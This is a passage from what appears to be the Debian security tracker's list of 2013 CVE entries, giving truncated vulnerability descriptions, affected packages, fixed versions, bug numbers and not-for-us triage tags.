intrusive to backport) - gnutls28 3.0.22-3 - cyassl 2.9.4+dfsg-1 - matrixssl (low) [squeeze] - matrixssl (Minor issue) [wheezy] - matrixssl (Minor issue) NOTE: matrixssl fixed this upstream in 3.4.1 - tlslite [wheezy] - tlslite (Minor issue) NOTE: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf CVE-2013-0168 (The MoveDisk command in Red Hat Enterprise Virtualization Manager (RHE ...) NOTE: RHEV management tool CVE-2013-0167 (VDSM in Red Hat Enterprise Virtualization 3 and 3.2 allows privileged ...) - vdsm (bug #668538) CVE-2013-0166 (OpenSSL before 0.9.8y, 1.0.0 before 1.0.0k, and 1.0.1 before 1.0.1d do ...) {DSA-2621-1} - openssl 1.0.1e-1 (bug #699889) CVE-2013-0165 (cartridges/openshift-origin-cartridge-mongodb-2.2/info/bin/dump.sh in ...) NOT-FOR-US: OpenShift CVE-2013-0164 (The lockwrap function in port-proxy/bin/openshift-port-proxy-cfg in Re ...) NOT-FOR-US: OpenShift CVE-2013-0163 (OpenShift haproxy cartridge: predictable /tmp in set-proxy connection ...) NOT-FOR-US: OpenShift haproxy cartridge CVE-2013-0162 (The diff_pp function in lib/gauntlet_rubyparser.rb in the ruby_parser ...) - ruby-parser 2.3.1-2 (bug #701637) NOTE: https://www.openwall.com/lists/oss-security/2013/02/22/5 CVE-2013-0161 (Havalite CMS 1.1.7 has a stored XSS vulnerability ...) NOT-FOR-US: Havalite CMS CVE-2013-0160 (The Linux kernel through 3.7.9 allows local users to obtain sensitive ...) {DSA-2669-1} - linux 3.8.12-1 (unimportant) - linux-2.6 (unimportant) NOTE: Minor information leak, rather a missing hardening feature than a security vulnerability. CVE-2013-0159 (The fedora-business-cards package before 1-0.1.beta1.fc17 on Fedora 17 ...) NOT-FOR-US: Fedora build script CVE-2013-0158 (Unspecified vulnerability in Jenkins before 1.498, Jenkins LTS before ...) - jenkins 1.480.2+dfsg-1~exp1 (bug #697617) NOTE: https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2013-01-04 CVE-2013-0157 ((a) mount and (b) umount in util-linux 2.14.1, 2.17.2, and probably ot ...) - util-linux 2.20.1-5.5 (bug #697464; low) [squeeze] - util-linux (Minor issue) [wheezy] - util-linux (Minor issue) CVE-2013-0156 (active_support/core_ext/hash/conversions.rb in Ruby on Rails before 2. ...) {DSA-2604-1} - rails 2.3.14.1 (bug #697722; high) - ruby-activesupport-2.3 2.3.14-5 (bug #697789) - ruby-activesupport-3.2 3.2.6-5 (bug #697790) NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: http://www.insinuator.net/2013/01/rails-yaml/ NOTE: https://www.openwall.com/lists/oss-security/2013/01/08/14 NOTE: experimental has 3.2.8-1 and should be affected too CVE-2013-0155 (Ruby on Rails 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x befo ...) {DSA-2609-1} - ruby-activerecord-3.2 3.2.6-4 (bug #697744) - ruby-activerecord-2.3 2.3.14-4 - ruby-actionpack-3.2 3.2.6-5 (bug #697802) - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: https://www.openwall.com/lists/oss-security/2013/01/08/13 CVE-2013-0154 (The get_page_type function in xen/arch/x86/mm.c in Xen 4.2, when debug ...) - xen (Only applies to Xen 4.2, which is only available in experimental) CVE-2013-0153 (The AMD IOMMU support in Xen 4.2.x, 4.1.x, 3.3, and other versions, wh ...) {DSA-2636-1} - xen 4.1.4-2 CVE-2013-0152 (Memory leak in Xen 4.2 and unstable allows local HVM guests to cause a ...) - xen (Only applies to Xen 4.2, which is only available in experimental) CVE-2013-0151 (The do_hvm_op function in xen/arch/x86/hvm/hvm.c in Xen 4.2.x on the x ...) - xen (Only applies to Xen 4.2, which is only available in experimental) CVE-2013-0150 (Directory traversal vulnerability in an unspecified signed Java applet ...) NOT-FOR-US: F5 BIG-IP APM, FirePass and other F5 products CVE-2013-0149 (The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 throug ...) - quagga NOTE: OSPF protocol vulnerability, quagga implementation not affected CVE-2013-0148 (The Data Camouflage (aka FairCom Standard Encryption) algorithm in Fai ...) NOT-FOR-US: FairCom c-treeACE CVE-2013-0147 RESERVED CVE-2013-0146 RESERVED CVE-2013-0145 (Buffer overflow in the TFTPD service in Serva32 2.1.0 allows remote at ...) NOT-FOR-US: Serva32 CVE-2013-0144 (Cross-site request forgery (CSRF) vulnerability in cgi-bin/create_user ...) NOT-FOR-US: QNAP CVE-2013-0143 (cgi-bin/pingping.cgi on QNAP VioStor NVR devices with firmware 4.0.3, ...) NOT-FOR-US: QNAP CVE-2013-0142 (QNAP VioStor NVR devices with firmware 4.0.3, and the Surveillance Sta ...) NOT-FOR-US: QNAP CVE-2013-0141 (Directory traversal vulnerability in McAfee ePolicy Orchestrator (ePO) ...) NOT-FOR-US: McAfee ePolicy Orchestrator CVE-2013-0140 (SQL injection vulnerability in the Agent-Handler component in McAfee e ...) NOT-FOR-US: McAfee ePolicy Orchestrator CVE-2013-0139 (The Arecont Vision AV1355DN MegaDome camera allows remote attackers to ...) NOT-FOR-US: Arecont Vision CVE-2013-0138 (BitZipper 2013 before Update 1 allows remote attackers to execute arbi ...) NOT-FOR-US: BitZipper CVE-2013-0137 (The default configuration of the Digital Alert Systems DASDEC EAS devi ...) NOT-FOR-US: Digital Alert Systems and Monroe Electronics CVE-2013-0136 (Multiple directory traversal vulnerabilities in the EditDocument servl ...) NOT-FOR-US: Mutiny CVE-2013-0135 (Multiple SQL injection vulnerabilities in PHP Address Book 8.2.5 allow ...) NOT-FOR-US: PHP Address Book CVE-2013-0134 (Cross-site scripting (XSS) vulnerability in the web interface in AirDr ...) NOT-FOR-US: AirDroid CVE-2013-0133 (Untrusted search path vulnerability in /usr/local/psa/admin/sbin/wrapp ...) NOT-FOR-US: Parallels Plesk Panel CVE-2013-0132 (The suexec implementation in Parallels Plesk Panel 11.0.9 contains a c ...) NOT-FOR-US: Parallels Plesk Panel CVE-2013-0131 (Buffer overflow in the NVIDIA GPU driver before 304.88, 310.x before 3 ...) - nvidia-graphics-drivers 304.88-1 (bug #704547) [wheezy] - nvidia-graphics-drivers (Non-free not supported) [squeeze] - nvidia-graphics-drivers (Non-free not supported) NOTE: http://nvidia.custhelp.com/app/answers/detail/a_id/3290 CVE-2013-0130 (Multiple buffer overflows in Core FTP before 2.2 build 1769 allow remo ...) NOT-FOR-US: Core FTP CVE-2013-0129 (Multiple cross-site scripting (XSS) vulnerabilities in pd-admin before ...) NOT-FOR-US: pd-admin CVE-2013-0128 (The Contact Customer Support feature in the TigerText Free Private Tex ...) NOT-FOR-US: TigerText CVE-2013-0127 (IBM Lotus Notes 8.x before 8.5.3 FP4 Interim Fix 1 and 9.0 before Inte ...) NOT-FOR-US: IBM Lotus Notes CVE-2013-0126 (Multiple cross-site request forgery (CSRF) vulnerabilities in index.cg ...) NOT-FOR-US: Verizon router CVE-2013-0125 (Cross-site scripting (XSS) vulnerability in fileview.asp in C2 WebReso ...) NOT-FOR-US: C2 WebResource CVE-2013-0124 (Multiple cross-site scripting (XSS) vulnerabilities in the administrat ...) NOT-FOR-US: ASKIA CVE-2013-0123 (Multiple SQL injection vulnerabilities in the administration interface ...) NOT-FOR-US: ASKIA CVE-2013-0122 (The avast! Mobile Security application before 2.0.4400 for Android all ...) NOT-FOR-US: avast! Mobile Security application CVE-2013-0121 RESERVED CVE-2013-0120 (The web interface on Dell PowerConnect 6248P switches allows remote at ...) NOT-FOR-US: Dell Switches CVE-2013-0119 RESERVED CVE-2013-0118 (CS-Cart before 3.0.6, when PayPal Standard Payments is configured, all ...) NOT-FOR-US: CS-Cart CVE-2013-0117 RESERVED CVE-2013-0116 RESERVED CVE-2013-0115 RESERVED CVE-2013-0114 RESERVED CVE-2013-0113 (Nuance PDF Reader 7.0 and PDF Viewer Plus 7.1 allow remote attackers t ...) NOT-FOR-US: Nuance PDF Reader CVE-2013-0112 RESERVED CVE-2013-0111 (daemonu.exe (aka the NVIDIA Update Service Daemon), as distributed wit ...) NOT-FOR-US: NVIDIA Update Service Daemon CVE-2013-0110 (nvSCPAPISvr.exe in the NVIDIA Stereoscopic 3D Driver service, as distr ...) NOT-FOR-US: NVIDIA Stereoscopic 3D Driver service CVE-2013-0109 (The NVIDIA driver before 307.78, and Release 310 before 311.00, in the ...) NOT-FOR-US: NVIDIA Display Driver service on Windows CVE-2013-0108 (An ActiveX control in HscRemoteDeploy.dll in Honeywell Enterprise Buil ...) NOT-FOR-US: Honeywell CVE-2013-0107 (Stack-based buffer overflow in Foxit Advanced PDF Editor 3 before 3.04 ...) NOT-FOR-US: Foxit Advanced PDF Editor CVE-2013-0106 RESERVED CVE-2013-0105 RESERVED CVE-2013-0104 RESERVED CVE-2013-0103 RESERVED CVE-2013-0102 RESERVED CVE-2013-0101 RESERVED CVE-2013-0100 REJECTED CVE-2013-0099 REJECTED CVE-2013-0098 REJECTED CVE-2013-0097 REJECTED CVE-2013-0096 (Writer in Microsoft Windows Essentials 2011 and 2012 allows remote att ...) NOT-FOR-US: Microsoft CVE-2013-0095 (Outlook in Microsoft Office for Mac 2008 before 12.3.6 and Office for ...) NOT-FOR-US: Outlook in Microsoft Office for Mac CVE-2013-0094 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0093 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0092 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0091 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0090 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0089 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0088 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0087 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0086 (Microsoft OneNote 2010 SP1 does not properly determine buffer sizes du ...) NOT-FOR-US: Microsoft OneNote CVE-2013-0085 (Buffer overflow in Microsoft SharePoint Server 2010 SP1 and SharePoint ...) NOT-FOR-US: Microsoft SharePoint CVE-2013-0084 (Directory traversal vulnerability in Microsoft SharePoint Server 2010 ...) NOT-FOR-US: Microsoft SharePoint CVE-2013-0083 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Serve ...) NOT-FOR-US: Microsoft SharePoint CVE-2013-0082 (Microsoft Office 2003 SP3 and 2007 SP3 allows remote attackers to exec ...) NOT-FOR-US: Microsoft CVE-2013-0081 (Microsoft SharePoint Portal Server 2003 SP3 and SharePoint Server 2007 ...) NOT-FOR-US: Microsoft CVE-2013-0080 (Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP ...) NOT-FOR-US: Microsoft SharePoint CVE-2013-0079 (Microsoft Visio Viewer 2010 SP1 allows remote attackers to execute arb ...) NOT-FOR-US: Microsoft Visio Viewer CVE-2013-0078 (The Microsoft Antimalware Client in Windows Defender on Windows 8 and ...) NOT-FOR-US: Microsoft Antimalware Client CVE-2013-0077 (Quartz.dll in DirectShow in Microsoft Windows XP SP2 and SP3, Server 2 ...) NOT-FOR-US: Microsoft Windows CVE-2013-0076 (The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Serv ...) NOT-FOR-US: Microsoft Windows CVE-2013-0075 (The TCP/IP implementation in Microsoft Windows Vista SP2, Windows Serv ...) NOT-FOR-US: Microsoft Windows CVE-2013-0074 (Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0 d ...) NOT-FOR-US: Microsoft Silverlight CVE-2013-0073 (The Windows Forms (aka WinForms) component in Microsoft .NET Framework ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0072 REJECTED CVE-2013-0071 REJECTED CVE-2013-0070 REJECTED CVE-2013-0069 REJECTED CVE-2013-0068 REJECTED CVE-2013-0067 REJECTED CVE-2013-0066 REJECTED CVE-2013-0065 REJECTED CVE-2013-0064 REJECTED CVE-2013-0063 REJECTED CVE-2013-0062 REJECTED CVE-2013-0061 REJECTED CVE-2013-0060 REJECTED CVE-2013-0059 REJECTED CVE-2013-0058 REJECTED CVE-2013-0057 REJECTED CVE-2013-0056 REJECTED CVE-2013-0055 REJECTED CVE-2013-0054 REJECTED CVE-2013-0053 REJECTED CVE-2013-0052 REJECTED CVE-2013-0051 REJECTED CVE-2013-0050 REJECTED CVE-2013-0049 REJECTED CVE-2013-0048 REJECTED CVE-2013-0047 REJECTED CVE-2013-0046 REJECTED CVE-2013-0045 REJECTED CVE-2013-0044 REJECTED CVE-2013-0043 REJECTED CVE-2013-0042 REJECTED CVE-2013-0041 REJECTED CVE-2013-0040 REJECTED CVE-2013-0039 REJECTED CVE-2013-0038 REJECTED CVE-2013-0037 REJECTED CVE-2013-0036 REJECTED CVE-2013-0035 REJECTED NOT-FOR-US: Apache CXF CVE-2013-0034 REJECTED NOT-FOR-US: Apache CXF CVE-2013-0033 REJECTED CVE-2013-0032 REJECTED CVE-2013-0031 REJECTED CVE-2013-0030 (The Vector Markup Language (VML) implementation in Microsoft Internet ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0029 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0028 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0027 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0026 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0025 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0024 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 al ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0023 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 a ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0022 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0021 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0020 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0019 (Use-after-free vulnerability in Microsoft Internet Explorer 7 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0018 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0017 REJECTED CVE-2013-0016 REJECTED CVE-2013-0015 (Microsoft Internet Explorer 6 through 9 does not properly perform auto ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0014 REJECTED CVE-2013-0013 (The SSL provider component in Microsoft Windows Vista SP2, Windows Ser ...) NOT-FOR-US: Microsoft Windows CVE-2013-0012 REJECTED CVE-2013-0011 (The Print Spooler in Microsoft Windows Server 2008 R2 and R2 SP1 and W ...) NOT-FOR-US: Microsoft Windows CVE-2013-0010 (Cross-site scripting (XSS) vulnerability in Microsoft System Center Op ...) NOT-FOR-US: Microsoft System Center Opera Manager CVE-2013-0009 (Cross-site scripting (XSS) vulnerability in Microsoft System Center Op ...) NOT-FOR-US: Microsoft System Center Opera Manager CVE-2013-0008 (win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, ...) NOT-FOR-US: Microsoft Windows CVE-2013-0007 (Microsoft XML Core Services (aka MSXML) 4.0, 5.0, and 6.0 does not pro ...) NOT-FOR-US: Microsoft XML Core Services CVE-2013-0006 (Microsoft XML Core Services (aka MSXML) 3.0, 5.0, and 6.0 does not pro ...) NOT-FOR-US: Microsoft XML Core Services CVE-2013-0005 (The WCF Replace function in the Open Data (aka OData) protocol impleme ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0004 (Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5. ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0003 (Buffer overflow in a System.DirectoryServices.Protocols (S.DS.P) names ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0002 (Buffer overflow in the Windows Forms (aka WinForms) component in Micro ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0001 (The Windows Forms (aka WinForms) component in Microsoft .NET Framework ...) NOT-FOR-US: Microsoft .NET Framework